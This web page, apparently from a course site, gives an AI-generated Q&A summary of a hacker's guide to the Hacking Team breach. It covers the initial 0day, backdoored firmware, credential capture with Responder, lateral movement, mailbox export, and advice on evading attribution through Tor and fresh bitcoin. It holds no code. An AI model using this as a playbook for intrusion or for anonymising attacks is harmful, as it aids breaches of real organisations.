txt

Phinphisher Hackback a DIY Guide.txt
Phinphisher Hackback A Diy Guide

A guide on offensive countermeasures and post-exploitation tools used in a specific case study.

This page contains AI generated content. Errors or omissions may be present. Use human level critical thinking.
  • Q: What specific tools did the author use for post-exploitation?
    A: Busybox, nmap, Responder.py, Python, tcpdump, dsniff, socat, screen, a SOCKS proxy server, and tgcd.
  • Q: How did the attacker initially gain access to Hacking Team?
    A: By exploiting a 0day vulnerability in an embedded device (spam filtering appliance/VPN) after finding it via port scanning.
  • Q: What is 'Responder.py' used for?
    A: Attacking Windows networks to capture credentials/hashes via LLMNR/NBT-NS poisoning when you have internal access but no domain user.
  • Q: How did the attacker access the 'Rete Sviluppo' (Development Network)?
    A: By finding a text file with passwords in Christian Pozzi's Truecrypt volume, which gave access to a Nagios server bridging the networks.
  • Q: What advice does the author give regarding attribution/OPSEC?
    A: Use new servers/domains, paid for with new bitcoin addresses, and avoid reusing tools or techniques linked to previous identities.
  • Q: What vulnerability opened the door to the Exchange server?
    A: Insecure backups found on iSCSI devices that were supposed to be on a separate network but were accessible from the main network.
  • Q: What is the purpose of the 'backdoored firmware' mentioned?
    A: To maintain persistent access to the embedded device after using the initial exploit, protecting the exploit from discovery.
  • Q: Why did the author use a virtual machine routed through Tor?
    A: To anonymize traffic and keep personal life separate from hacking activities.
  • Q: What does the author say about 'NoSQL' databases?
    A: They often lack authentication by default, making them easy targets ('NoAuthentication').
  • Q: How did the attacker download the email data?
    A: Using PowerShell's 'New-MailboxExportRequest' cmdlets after gaining Domain Admin access.

Ask a question

Have a doubt or need clarification?



I’m here to help. Share your question, and I’ll get back to you with the guidance you need regarding the course.

Thank you!

I have received your message and I shall get back to you shortly.